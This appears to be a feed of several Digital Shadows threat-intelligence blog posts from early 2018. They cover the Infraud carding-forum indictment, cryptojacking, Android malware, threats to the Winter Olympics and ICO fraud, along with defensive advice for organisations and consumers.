    The “Infraud Journal” user profile for this blog site contained a link to the infraud[.]cc website, and a Twitter account ( that is now suspended. The user stated their location was Borispol, Ukraine and used the Buddhist symbol Om as a logo. The account was created on 30 October 2010 and was last updated on 05 August 2014.


    Figure 4: infraud profile on Infraud Journal blog


    Online profiles using the “infraud” naming started appearing frequently across several criminal forums in December 2010 and January 2011. Many of these profiles used details and indicators previously used on the WordPress and Infraud Journal blogs, including the names “infraud” or “Ministry of Fraudulently Affairs”, and the Om Buddhist symbol as a profile picture. In this example from 26 January 2011 (below), the user infraud advertised an IP address and domains associated with the Infraud operation.


    Figure 5: Post made to hpc[.]name forum by user “infraud” containing links to various infraud domains


    How it worked

    Between 2010 and 2018, the Infraud Forum switched to several different top level domains and attracted large numbers of members to the forum (Brian Krebs puts this number at almost 11,000).

    The reputation of the forum also grew; a vendor with a presence on Infraud would have added legitimacy.  Even some of the most reputable Automated Vending Carts (AVCs) – such as the popular site Joker’s Stash – sought a presence on the Infraud Forum (see below). While Infraud was not unique in this respect – Verified, Omerta, and Exploit are other examples of forums where vendors look to establish a reputation – it was certainly a significant player.


    Figure 6: Post by JokerStash on wtl[.]pw


    In order to facilitate these vendors, the forum had a specific section for vendors to advertise. Vendors like Unnicat, Dark4sys, and Deputat (all also named in the indictment) had a presence here.

    The site extended beyond being simply a collection of credit card vendors, with separate exchanger and escrow services also available. Users could access these services at different access levels, such as a VIP.


    Figure 7: A screenshot of Infraud[.]cc



    The Infraud Forum is another example of the level of professionalization that exists within the criminal underground. This forum was clearly highly hierarchical and relied on its extensive networks and reputation to make a lot of money.

    Many of the aliases disclosed in the indictment were at one point active across a host of different underground forums, including the AlphaBay forum. Although the full details of the law enforcement operation have not yet been released, it’s possible that the seizure of AlphaBay in 2017 provided valuable intelligence in this operation. Nevertheless, news that 36 prominent cybercriminals – who were active across several sites – have been closely monitored by international authorities will act as a further blow for the criminal community, which is still dealing with the impact of the AlphaBay and Hansa seizures.

    The impact of this announcement should be placed into context. It’s worth noting that of the 36 individuals named in the indictment, only 13 have been apprehended. Indeed, although the site infraud[.]wf appears to have been seized, some sites that were run by vendors on the Infraud Forum remain active such as d4rksys[.]cc (see Figure 8 below), a site allegedly run by dark3r. This is similarly the case for sites run by Unnicat and Debutat. This is a reminder that, although Infraud was a significant player, there are many more forums and AVCs in operation, and the closure of one site will mean criminal actors will migrate to other forums.


    Figure 8: A screenshot of d4rksys[.]cc, taken on 07 February 2018.

    Shifts within the criminal ecosystem

    Given the increased attention from law enforcement, it’s possible we will see more forums turning to new technologies to reduce the likelihood of domain seizure. Joker’s Stash has already moved its site hosting to a blockchain-based domain name system (DNS) provided by the cryptocurrency Emercoin. We’ve seen adverts demonstrating this change since around the end of September 2017, on multiple clear web carding forums.


    Figure 9: Joker’s Stash advert on carding forum with link and instructions to latest Blockchain DNS site


    The adverts direct users to a “Blockchain DNS” browser extension for Chrome and Firefox, which enable their users to connect to top level domains (TLDs) such as .bazar, .coin, .lib, .emc and others. Domains using these TLDs are not typically resolvable through generic browser configurations. As Emercoin’s domain name records are completely decentralized, they cannot be altered, revoked or suspended by any authority; only a record’s owner can modify or transfer it to another owner. The owners of Joker’s Stash therefore likely sought to avoid takedowns or other external disruption by moving to a blockchain solution.

    This is not the first example of threat actors using blockchain-based DNS. Both operators of the botnet Necurs and point of sale (PoS) malware Kasidet have used the Namecoin peer-to-peer network which has no central authority, likely in attempts to avoid law enforcement takedowns of their command and control (C2) infrastructure. For the owners of Joker’s Stash, the use of Emercoin’s DNS might trump traditional DNS for the same reasons, but it still requires visitors to take additional steps in order to visit the site and that might drive away some of its businesses. In the end, as with a lot of security, the benefits might come at the sacrifice of ease-of-use.


    No significant change anticipated

    Unfortunately, the reality is that this latest piece of news constitutes no real decrease in the threat posed to merchants, consumers and financial institutions from card fraud. Nevertheless, we will be keeping tabs on any changes that occur from these latest arrests, as the cybercriminal community bounces back from another setback. To find out more about the underground carding ecosystem, download a copy of our previous research report, Inside Online Carding Courses Designed for Cybercriminals.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Cryptojacking: An Overview Tue, 13 Feb 2018 17:59:17 +0000 What is Cryptojacking?

    Cryptojacking is the process of hijacking someone else’s browser to mine cryptocurrencies with their computer processing power. There are several pieces of software available that do this, including Coinhive, Authedmine and Crypto-Loot. While such tools are not necessarily illegal, the stealth and lack of user consent associated with them has led many to view crypto jacking software as malware; the security firm Malwarebytes, for example, has blocked coinhive[.]com.

    This week it was announced that a number of government websites, including the NHS, had been serving cryptojacking malware, meaning that visitors had been unknowingly mining cryptocurrency.


    Monero mining is big business; browsers, extensions and mobile apps have all reportedly spread Coinhive in the past few months. Coinhive is a Javascript miner for Monero, a cryptocurrency that has been steadily growing in popularity since 2014. In January 2018, a proof of concept called CoffeeMiner was released, which allows actors to access public Wi-Fi networks and mine cryptocurrencies.

    More recently, a malvertising campaign targeted Google’s DoubleClick advertising tool to compromise adverts and distribute Coinhive. The sharp increase in use of Coinhive miners correlated to an increase in traffic to five malicious domains, which was subsequently linked back to DoubleClick advertisements.

    Crypto Jacker: A New WordPress Plugin

    A new product called Crypto Jacker looks combine Coinhive, Authedmine and Crypto-Loot and incorporate these into a WordPress plugin with added Search Engine Optimization (SEO) functionality. The domain cryptojacker[.]co was registered on November 30th, 2017 and seeks to sell a one-time version of the Crypto Jacker software for $29. With the software purchased, users can install Crypto Jacker on an unlimited number of their domains.


    Figure 1: The Crypto Jacker software


    Crypto Jacker “provides a way to earn crypto currency from people who visit your links, even when you’re sharing other websites that you don’t own. We even cloak your website links for your (sic.) so they look like the original shares on social media.” This is done by using an iframe to clone content from popular website, as shown in Figure 2.

    Figure 2: The user interface of the Crypto Jacker plug-in

    There are a couple of things Crypto Jacker does to increase traffic to the site.

    1. Users can load the Meta Data from the destination url, making it feature highly in search engine rankings.
    2. “Social Cloaking” (as Shown in Figure 3) makes the imitation link appear to be from the original destination source, increasing the likelihood of clicks.

    Figure 3: Crypto Jacker’s “social cloaking” demonstration video

    It’s unsurprising that Crypto Jacker has these SEO features, given other pieces of software under the name Thomas Witek (the author of Crypto Jacker) include “Click Jacker”, “Link Cloaker”, and “Gram Poster”. This shift in the business model to focus on cryptocurrency mining instead of advertising is explicitly referenced on the website: “advertising on the web is difficult to profit from….why shouldn’t you mine crypto coins.” This is part a broader shift towards cryptocurrency fraud by a variety of actors that we have provided a more detailed analysis of in our recent research report, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Scam or Legitimate?

    Is this a scam? It’s possible that Crypto Jacker is a ruse to cash in on web developers’ interest in cryptocurrency mining. This review questions the nature of the site itself.

    Our own tests of the demo website (paidallday[.]com/what-you-need-to-know-about-bitcoin), shown on the Crypto Jacker website, shows that cryptocurrency mining is likely taking place. As shown in Figure 4, the website appeared to have the plugin “cj-plugin”, which launched the “” script. When we visited the site, CPU usage increased significantly to 50% (as shown in Figure 5). While this does not confirm the Crypto Jacker product is legitimate, it does add some credibility to their claim.

    Figure 4: The source code of paidallday[.]com/what-you-need-to-know-about-bitcoin, a demo website shown in Crypto Jacker videos

    Figure 5: CPU usage peaking at the time of the visit to the website

    Interest in cryptocurrencies shows no sign of slowing down and, while Crypto Jacker does not appear to have developed a large user base, its emergence – if legitimate – is an attempt to lower the barrier to entry for those looking to use stealthy cryptocurrency mining software.

    Protect yourself from Crypto mining

    1. Have a reputable ad blocker

    Organizations that do not wish to be “crypto jacked” and inadvertently mine cryptocurrency should ensure they have a reputable ad blocker in place. Consider ad blockers such as AdBlock, AdBlock Plus, 1Blocker, and UBlock. The NoCoin browser extension was also developed to block coin miners such as Coinhive.

    2. Apply patches to known vulnerabilities

    Organizations should apply patches and mitigation to known vulnerabilities as these can be used to deliver crypto miners. In December 2017 PyCryptoMiner, for example, began exploiting a vulnerability affecting JBoss servers that was first discovered in October. More recently, a Struts server exploit has been used for Monero mining. Sites such as the US CERT, the National Vulnerability Database and MITRE can provide the latest information on newly disclosed vulnerabilities. Red Hat Software provided mitigation advice for the JBoss vulnerability exploited by PyCryptoMiner. Patches for the Struts vulnerabilities are also available.


    Download our latest research paper The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud to learn more about cryptocurrency fraud, and ways to protect against.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 12.02.2018 Mon, 12 Feb 2018 15:23:39 +0000 With the 2018 Winter Games beginning this week, the Digital Shadows Research Team focused on threats to those traveling to South Korea in this episode of Shadow Talk. There was also a roundup of the most recent cyber security news.

    Malware in Winter Olympics spearphishing campaign identified

    Anti-virus security company McAfee published a report detailing four variants of malware linked to the targeting of organizations associated with the XXIII Winter Games in South Korea. The variants were identified as “Gold Dragon”, “Brave Prince”, “Ghost419” and “RunningRat”. During the games themselves, we expect there to be a rise in cybercriminal activity, achieved through point of sale malware infections at hospitality, leisure and retail locations, ATM skimming, banking fraud and scam emails. VIPs travelling to the event are advised to use alternative forms of payment like chip and pin, pre-paid and pre-capped cards. Travellers should also opt for Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi.


    Operation Pzchao: not your typical espionage campaign

    The espionage-driven campaign Operation Pzchao has affected multiple entities across government, technology, education and telecommunications in North America, Russia, Oceania and Asia since 2016. Victims received emails containing a Visual Basic Script (VBScript) file, which retrieved second-stage payloads: a Bitcoin mining application, the credential harvester “Mimikatz”, and variants of the “Gh0st” remote-access trojan (RAT). Digital Shadows analysts casted doubt on the reported attributions to a Chinese state-linked advanced persistent threat (APT) group — the use of a Bitcoin miner, inconsistencies in the reported distribution method and use of a widespread RAT tool with no additional custom malware are not typical of a highly coordinated, state-linked group.


    Adobe zero-day vulnerability exploited in attacks against South Koreans

    The South Korean Computer Emergency Response Team (CERT) warned that a critical Adobe vulnerability was exploited in attacks targeting South Koreans involved in geopolitical research. Spearphishing emails were the only known vector of the attacks, which were attributed to a North Korean threat group. The emails distributed a variant of the “ROKRAT” trojan, which has reconnaissance and information-stealing capabilities. Adobe has issued security updates for the vulnerability, identified as CVE-2018-4878. Further exploitation attempts of this flaw are highly likely.


    Denial of service vulnerability discovered in WordPress platform

    A vulnerability identified in the WordPress online publishing platform could enable an attacker to conduct denial of service attacks. The researcher who identified the flaw claimed that requests for large JavaScript or Cascading Style Sheet files could be sent repeatedly to sites, resulting in the denial of legitimate traffic. WordPress has indicated it does not plan to patch the flaw, although exploitation of this vulnerability could potentially reverse this decision. The researcher released POC code; and secondary reporting suggested a small number of exploitation attempts had been detected. Further attempts are considered highly likely to occur.


    United States authorities charge 36 individuals allegedly behind the ‘Infraud’ cybercrime forum

    On Wednesday 7 February, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud carding forum. This was a result of an operation known as “Shadow Web”. Although Infraud was a significant player in the carding ecosystem, there are still many more forums and Automated Vending in operation, and the closure of one site will mean criminal actors will migrate to other forums. Therefore, the threat posed to organizations by carding fraud remains the same. Our research also indicated that some sites that were run by vendors on the Infraud Forum are still active.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    2017 Android malware in review: 4 key takeaways Thu, 08 Feb 2018 18:25:34 +0000 Android mobile devices were an attractive target for malicious activity throughout 2017. The ubiquity of these devices, and the sensitive data they often hold, enticed both espionage and financially motivated attackers. In 2017, we reported on 48 separate campaigns that targeted mobile applications and vulnerabilities. Our research highlighted the following key takeaways from the past year:

    1. Official app stores are not infallible

    Google Play was the most frequently cited single-source of Android malware infections. Despite the security measures put in place, the official Google Play store can still be used to distribute malicious applications; and given its popularity, criminal actors will continue to target it as a means of distributing malicious apps.

    However, 66% of reported initial infections were from locations other than the official app store. Google Play’s profile can also slightly skew public reporting of Android malware infections, as security researchers will often focus on identifying security weaknesses on the most well-known platforms ahead of other, third-party sites. The number of infection entry points outside of app stores should remind us to remain vigilant of phishing texts and emails, and to take added precautions when browsing on mobile devices.


    Figure 1 Reported initial infection points for mobile malware since January 1st 2017 (unknown omitted)


    2. Appearances can be deceiving

    Attackers predominantly used two variations of malicious apps to disguise malware and push downloads; apps either a) acted as legitimate resources such as cryptocurrency, security and games services, or b) fraudulently used branding associated with credible organizations, like Chrome or Adobe.

    Once installed, malware used a variety of methods to obtain device or user information, including requesting that the user accepts unnecessary permissions and escalating administrative privileges. Where user interaction was required to harvest data, overlays – where a malicious app superimposes over a legitimate app – were commonly deployed to prompt users to enter personal and financial information.

    These Android malware deployments included both opportunistic campaigns where users inadvertently downloaded malicious apps from a given site, as well as more targeted social engineering campaigns, such as those targeting users based in a particular country or industry.


    Figure 2 Reported techniques, tactics and procedures in Android incidents since January 1st 2017


    3. Espionage and financial gain were the primary motives

    Gathering information, such as profiling device information or recording phone calls and messages, was the most prevalent reason for infection. Collecting financial and banking data came a close second. Mobile banking malware uses sophisticated techniques for harvesting data, including overlays specific to target banks, and intercepting SMS messages to obtain multi-factor authentication codes.

    Given the increase in reports of cryptocurrency mining malware in 2018, which is partly a result of the steep rise in cryptocurrency prices, there is a realistic possibility that more Android malware attacks will incorporate cryptocurrency mining payloads in future.


    Figure 3   Reported function of mobile malware since January 1st 2017

    4. How to avoid infection

    We expect malware campaigns against the Android platform to continue in 2018; nevertheless, enterprises and individuals can take several preventative measures to lower the risk of infection:

    • Use the official Google Play store; only download “Play Protect verified” apps from legitimate companies
    • Only allow limited permissions for downloaded apps
    • For enterprise devices, Mobile Device Management solutions give IT security staff control to set access permissions and restrictions
    • Do not root enterprise devices, as rooting allows access to the Android operating system code. Preventing rooting mitigates unauthorized administration privilege access.
    • Deploy end-point Antivirus solutions on individual devices
    • Bring Your Own Device (BYOD) enterprises should establish user policies and disallow connection of BYOD to corporate infrastructure.
    • Educate employees on threats associated with SMS phishing and mobile device browsing

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox.

    Phishing for Gold: Threats to the 2018 Winter Games Tue, 06 Feb 2018 14:12:22 +0000 Digital Shadows has been monitoring major sporting events since 2014, beginning with the Winter Olympics in Sochi, Russia, and then the 2014 World Cup in Brazil. The 2016 Olympics, held in Rio de Janeiro were a hotbed of cyber activity, dominated by the OpOlympicHacking campaign, physical protests, and high levels of cybercrime against attendees. Rio shows that cyber actors look to profit from the millions of visitors, global media audience and increased number of financial transactions that accompany major sporting events.

    Although hacktivist and physical protest activity often accompany events with international media coverage, we believe cyber crime and fraud will be the most imminent and prevalent threats to the 2018 Olympic event and its attendees. Rio was also significant as it highlighted how actors working with the approval or on behalf of nation-states can use the cover of global sporting events for their own goals. In 2018, regional tensions between North and South Korea may well contribute to nation-state cyber operations, although it’s unclear how the recent public overtures between the two states and the decision to invite North Korean athletes to the event will affect this.

    As millions of fans descend on South Korea, particularly business and political VIPs, we believe the event will likely be targeted by a variety of cyber actors. This includes financially motivated cyber-criminals and more capable nation state actors – possibly as a dry-run for campaigns during the larger 2018 World Cup to be hosted later this year in Russia.


    The Games Have Already Begun

    We have already reported on data leaks and phishing attempts targeting organizers and affiliates of the Winter Olympics. As well as this, our SearchLight platform found several potentially malicious domains, social media accounts and infrastructural issues that could be used in future attacks.

    Both in the lead up and during the event, we expect to see:

    • Phishing – As well as targeting volunteers, attackers will use interest in the event as a lure when sending malicious phishing emails. We discovered several typo-squat domains that use the 2018 Winter Olympics and World Anti-Doping Agency (WADA) brand names. These domains were not registered to official entities, and over half were registered in Russia and Ukraine or behind proxy services. Although not currently used in active campaigns, these domains could be used in phishing attacks to distribute malware or harvest credentials.

    Selection of typo-squat domains discovered by Digital Shadows


    • Exposed credentials. We searched for examples of exposed credentials belonging to Olympic and WADA accounts in our repository of third party breaches. Here we found at least 300 examples of Olympic or WADA credential pairs in multiple breached datasets that became public in the last 12 months. These credentials could be used for further cyber-attacks against Olympic organizations, including spear-phishing and account takeover.


    Selection of exposed credentials for Olympic and WADA domains in breaches found by Digital Shadows

    • Data Leaks. In January, the Fancy Bears group – a self-proclaimed hacktivist group believed to be affiliated to the Russian state – published emails from the International Olympics Committee and International Luge Federation, likely in retaliation to the banning of Russian athletes for alleged doping controversies. On January 31, they published further information implicating Canadian athletes. “Fancy Bears” is a play on the widely used name “Fancy Bear” (APT-28), which is refers to an espionage group that the US intelligence community has linked to the Russian intelligence services. It is still unclear whether the two groups are one and the same; nevertheless, data leaks against WADA and the International Olympic Committee have been conducted under the Fancy Bear name since Rio in 2016.

    Fancy Bears announce leak of documents belonging to Canadian athletes via Twitter

    • Malware attacks. 2018 Olympic volunteers were targeted by macro-malware through email attachments imitating genuine documentation from the official 2018 Winter Olympics website. The original contained logistics details for the volunteers, suggesting the malware was aimed at either the volunteers themselves, or the volunteer portal. More recently, a data-gathering malware known as GoldDragon was identified targeting organizations associated with the 2018 Winter Olympics. In this case, the payloads were designed to establish persistence on targeted machines and enable further data exfiltration, as well as provide an ability to download additional malware.
    • Attacks on Wi-Fi network users. Attackers have previously compromised public Wi-Fi networks when going after high-value targets. The campaign known as DarkHotel, for example, used spoofed software updates on infected Wi-Fi networks targeting hotels in Asia, while APT-28 used credentials likely stolen from Wi-Fi networks in hotels to deploy remote access malware that could steal information and allow for lateral movement across networks.
    • Financial cybercrime. Criminals will often try and exploit the large number of visitors and increase in financial transactions, particularly in  areas  of  high  tourist  density  such  as  city  centers,  hotels,  restaurants  and  shopping  For example, between March and July 2017, over 41 Hyatt Hotel locations in 11 countries were compromised, resulting in the compromise of customer payment card details. 18 of the affected hotels were in China, but branches in South Korea, Japan, North and South America were also impacted. As well as an increase in payment card theft through point of sale malware infections at hospitality, leisure and retail locations, expect a rise in ATM skimming, banking fraud and scam emails.


    Visualizing the Threat

    Below is a visualized form of the expected threat landscape of the upcoming event. It breaks down potential targets for the Winter Olympics and presents some of the most likely risks for each.



    Podium Finish

    The 2018 Winter Olympics is expected to be a focal point of criminal and politically-charged cyber activity, as seen in previous similar events. The following mitigation techniques can help limit the impact of the malicious activity that will likely occur:

    • Update and patch. First and foremost, organizations should make sure their firmware and OS systems are updated with the latest patches, especially Microsoft applications.
    • Be wary of scams and phishing emails. Do not click on any links in emails marketing or referencing the event. The IOC will not be launching an email marketing campaign with “FREE TICKETS!!1!” and any claimed scandals pertaining to athletes can be found on trusted news media sites, not in any “YOU WON’T BELIEVE HOW THIS ATHELETE WON 20 GOLD MEDALS, CLICK HERE TO FIND OUT” emails.
    • When downloading applications, make sure you only initiate these from legitimate sites such as the Apple and Google stores. Also ensure you review security and access permissions granted to these programs. In November 2017 it was discovered that Android malware previously used by the Lazarus Group – an actor affiliated to the North Korean state – had been used to target the general public in South Korea.
    • Be vigilant when using ATMs in-country. Look out for evidence of machine tampering: some skimming device can be spotted by a quick wiggle of the card reader or through visible marks on the PIN code area. To help lessen the impact of Point of Sale malware and ATM skimming, alternative forms of payment like chip and pin, pre-paid and pre-capped cards should be considered.
    • Avoid untrusted networks. Corporate users should use Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi. Multi-Factor authentication can also help combat successful account compromises.
    • Protect VIPs. High-value employees traveling to the event should consider having their technology and devices placed in isolated corporate networks preceding and during the event. Following the event, a quarantine period could also be established to ensure nothing malicious has been brought back into the corporate network.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Shadow Talk Update – 02.05.2018 Mon, 05 Feb 2018 15:26:46 +0000 In this week’s podcast episode of Shadow Talk, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.


    In-development malware samples observed targeting Spectre and Meltdown

    Researchers reportedly detected malware samples designed to exploit the Spectre and Meltdown vulnerabilities. The samples appeared to be in development and were not actively exploiting the flaws. Though these samples may have been designed for exploitation purposes, there were still no detected samples accomplishing this activity. It is likely that Spectre and Meltdown exploits will continue to be developed into the near future.


    Japanese cryptocurrency stolen in huge cyber-heist

    On January 26, 2018 the Japan-based cryptocurrency exchange Coincheck suffered a large-scale cyber-heist. Attackers reportedly stole 58 billion Japanese yen’s ($530 million) worth of NEM, a peer-to-peer cryptocurrency established in 2015. Coincheck announced it will reimburse most of the stolen funds to its 260,000 affected customers. As the technology and security framework supporting digital currencies expands attackers will likely look for vulnerabilities, such as exchange platforms where digital “hot” wallets are connected to the internet. The consistently high value and increased availability of cryptocurrencies means threat actors will likely target them regularly this year.


    Dutch banks suffer DDoS attacks

    On 29 January 2018 financial institution Rabobank became the latest Dutch company to announce it had been affected by a distributed denial of service (DDoS) attack. Public reporting has been largely speculative, preventing independent assessment of the attacks. The botnet associated with the attacks has not been detected in other DDoS activities, and the size of the attacks (40Gbps) was relatively small, if accurately reported. Some media outlets linked the attacks to Russia, claiming they were retribution for recent reports of Dutch intelligence agencies infiltrating the Russia-linked group “APT-29” (Cozy Bear).


    Anonymous collective announces new phase of OpCatalunya

    On 29 January 2018 AnonPlus announced a new phase of OpCatalunya, the Anonymous operation supporting Catalan independence. OpCatalunyaNew has so far caused many DDoS claims and affected several Spanish companies across a variety of sectors. The catalyst may likely have been a Spanish Constitutional Court ruling on the investiture of regional president Carlos Puigdemont, an independence supporter. The coordination of the new campaign by small groups indicates the growing split in the Anonymous collective and has enabled operations to gain longevity and consistency of targeting.


    Severe RCE vulnerability in Cisco ASA devices

    Cisco released software updates addressing a remote code execution (RCE) vulnerability affecting Cisco Adaptive Security Appliance (ASA) software. There has been no proof of concept exploit code identified at the time of writing for vulnerability CVE-2018-0101, nor any reports of exploitation by threat actors. However, as RCE vulnerabilities are attractive to threat actors, exploitations are a realistic possibility in the next three months to a year. Cisco provided list of affected products, as well as details on how to identify vulnerable software versions.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Four Ways Criminals Are Exploiting Interest in Initial Coin Offerings Thu, 01 Feb 2018 13:43:00 +0000 Initial Coin Offerings (ICOs) are a way of crowdfunding cryptocurrencies and cryptocurrency platforms. By the end of 2017, almost $4 billion was raised in this way. However, as consumers rush to be the first to invest in a promising new cryptocurrency or platform, their investments can instead go into the account of criminals. These criminals seek make their money in four main ways:

    • Targeting genuine cryptocurrency platforms
    • Exit scams
    • Imitating or spoofing cryptocurrency platforms
    • Price manipulation

    This is only one aspect of cryptocurrency fraud, but you can learn more in our latest research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.


    Targeting Genuine Cryptocurrency Platforms

    At the end of January, a Japanese cryptocurrency exchange platform called Coincheck announced the theft of over $500m in NEM. The cryptocurrency NEM has since stated that attackers targeted a vulnerable wallet that had not used the currency’s available security features. $530 million surpasses the record set by Mt Gox in 2014.

    Targeting these platforms doesn’t have to be complex. In July 2017, criminals compromised the CoinDash website, replacing the initial Ethereum address to one controlled by the attacker. This new address received at least 2,314 payments from prospective CoinDash investors, totaling over 40,000 Ether. Over $7 million in Ethereum had been transferred to the fake address by the time CoinDash noticed the issue and suspended the ICO.


    Figure 1: Attacker’s Ether wallet during CoinDash ICO in July 2017


    More recently, the Initial Coin Offering for blockchain application company Experty was targeted by actors who sent phishing emails to potential coin buyers, prompting them to send funds to an attacker-owned wallet in return for a 33% bonus. The attacker’s wallet reached about 125 Ether ($125,000). We’ll be digging into approaches to phishing and account takeover against cryptocurrency holders in a future blog.


    Exit scams

    An exit scam refers to those cryptocurrency or platforms that are established with the plan to attract many customers before disappearing and stealing all the funds. There have been a host of exit scams in 2017 and 2018, including Confido, Benebit and Plexcoin.

    This week, the US Securities and Exchange Commission (SEC) claimed to have shut down an alleged Initial Coin Offering scam by AriseBank. The site claims to have raised over $600 million of their $1 billion goal. The SEC determined that AriseBank had violated security regulations as they were selling financial products that required the firm be registered with the SEC. While the SEC has put a concerted effort into identifying and assessing potentially fraudulent ICOs, the sheer number of new cryptocurrency products and platforms means exit scams will likely continue for some time.


    Spoofing Cryptocurrency Platforms

    Rather than create their own new cryptocurrency, criminals can also impersonate existing platforms. A recent example is the announcement that Telegram would be launching its own coin, which has led to a host of different spoof domains hoping to lure unsuspecting consumers into investing on the wrong platform. Despite Telegram stating that any announcement would be first done on Telegram, this has not stopped the creation of several spoof sites. Grampreico[.]com (shown below) is one such example, making $2000 to date.

    Figure 3: Grampreico[.]com claiming to be the initial coin offering for “Gram” token

    A different, though similar, approach is to register a similar looking domain and clone the contents of the target website. Myetherwallet[.]uk[.]com is a good example of a spoof site, a site that offers the ability to access your wallet through providing them with your private key.

    Figure 4: Spoof site for myetherwallet[.]com


    Cryptocurrency Price Manipulation

    Just as traders illegally inflate prices of stock in the real world, so too do groups of cybercriminals. This technique is known as “pump and dump”, and several online groups exist to inflate the price of smaller, less well-known currencies in order to cash in on the increase in value.

    Figure 5 shows the process followed by one Discord “pump” group, describing how they first “spread great news on twitter and Reddit”, before “mass retweet, like and react on the tweet”.

    Figure 5: A description of how “pump and dump” works, as described in one Pump and Dump Discord group


    Questions to Ask Yourself Before Investing in an ICO

    ICOs can be a great way for consumers to identify promising coins and platforms early on and profit from their rise. However, potential investors should be wary of sites or seller with unsolicited offers, or coins that guarantee high returns without solid justification. Three questions you can ask yourself are:

    1. Does the coin you are looking to invest in have an active online community with engaged developers?
    2. Have other online users reported the coin as a scam?
    3. Does the coin’s documentation hide behind marketing jargon that makes no effort to explain the technical aspects?

    For those that do invest, make sure you have strong password hygiene and make use of multifactor authentication to secure your accounts.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud or listen to our podcast below:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Why Marketing Leaders Must Take Action To Manage Digital Risk And Protect Their Brand Tue, 30 Jan 2018 14:14:20 +0000 I am one of you. I have been in the marketing field for more than 20 years and have seen unimaginable technology shifts that have made the world a more connected and efficient digital machine. We can now engage digitally with consumers around the globe on so many screens (watch, mobile, tablet, laptop, desktop, TV, automobile, etc), at any place and at any time. The companies we work for have greatly benefited from this new digital age. We now have data everywhere, including customers, employees, and third party data on all kinds of devices, on premise and in the cloud. Combine these two digital shifts and we have an amazing opportunity as marketers to engage in a personal way with our customers like never before. With this great opportunity, there also comes great risk if your company is not protecting itself from digital risks.

    Everyone knows about the brands that have been breached. You read about it in the headlines almost daily that another brand has been breached and the data belonging to hundreds of millions of customers and employees has been stolen. Breaches have become so common that we are all getting tired of hearing about it. Many of the breaches occur due to phishing and social engineering; making use of malicious websites, fake social media profiles, and fake mobile applications to trick customers and employees to unknowingly hand over their personal data and log-in credentials. This data is then used for profit by the attackers or sold on the open, deep, and dark web for others to do what they will. It impacts everyone including the company, the brand, customers, third parties, employees, you, me, and even our kids.

    As marketing leaders, we are all brand stewards for our company and our customers. We need to do everything we can to make our customers love us and trust us. We could do 99.999% of things right, but with one simple “We’ve been hacked” experience, it could wreck it all. That is why we must play an active role working with our security team and be proactive in managing digital risk to protect the brand. As I have learned over the years, the best way to help customers and businesses is to tell them real customer stories that they can relate to as they share the same pain and concerns. I am about to share some real customer stories with you. These stories are really important as many of you, your brand, and your customers may be impacted by these same issues. Here are some customer stories that are 100% real that every marketing leader should know about as these digital risks are your risks.

    1. We found malicious website domains that look like the real brand:

    By monitoring for registrations of domains that appear to look similar to a well-known brand’s website, a spoof domain was discovered. The domain had been registered overnight, swapping a “rn” for an “m” so it looked exactly like the brands .com website. The content was an exact mirror of the client’s legitimate site and, aside from lacking some functionality of the legitimate site, appeared genuine to the casual user. The goal of the fake website was to fool unsuspecting users into entering in their usernames and passwords. The attackers could then use these credentials to login as the customer, take over their account and drain their funds resulting in upset customers who have had their money stolen and ultimately hold your brand accountable. Brand damage successful.

    The good news is with effective Digital Risk Management, you can identify these fake websites, and take them down before fraud is conducted against your customers.

    Malicious website domain detected

    Example: Malicious website domain detected, impact, recommended action, and takedown.

    2. Fake social media profiles that are indistinguishable from your real brand:

    By monitoring social media profiles for a very large customer, we discovered that more than 500 fake social media profiles that were hijacking their brand. Some of the profiles looked so legitimate, that the company was amazed by how close the cyber criminals came to replicating their legitimate social media site that even some employees could not determine if it was real or not. Cyber criminals used these fake profiles to sell counterfeit products, steal credit cards as well as credentials. Brand Damage Successful.

    The good news is with effective Digital Risk Management, fake social media profiles can be quickly identified and taken offline.

    Fake social media profile example

    3. Your customers unknowingly using fake mobile applications taking advantage of their privacy:

    By monitoring official app stores including the Apple Store or the Android Market as well as and third party app stores for references to the company’s branding, a malicious app impersonating their brand was detected. Analysis of this malicious app revealed that it had spyware capabilities and could steal information from its users. It could steal data ranging from sensitive documents to login credentials. Brand Damage Successful.

    The good news is that with effective digital risk management, the company was provided with an overview of the risks associated with the mobile application, screenshots of the application, and critically the ability to have the malicious app removed from the store.

    Fake Mobile App Detected

    Example: Fake Mobile App detected, impact, recommended action, and takedown

    These are just three real stories that had the potential to impact consumers and the brands they trust. There are hundreds more examples of brand exposure that you as a marketing leader must learn more about. You can also read up on additional brand exposure use cases here. Earlier, I asked you to listen to these stories as these same stories could be happening to your customers, putting your brand at risk. It is not my intention to scare you but to educate you on what is going on right now, today, this very minute.

    This is why as marketing leaders, we must take action to work with our security team to manage digital risk and protect our brand. By considering the security implications of phishing sites and social media, security shifts from an IT function to a company-wide concern. If you take action, you can minimize the impact of a hack or stop it before it effects your customers and your brand.

    Interested in learning more about protecting your brand from digital risks and the dark web? Join our webinar with FitBit on Brand Protection.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Dan Lowden
    CMO, Digital Shadows

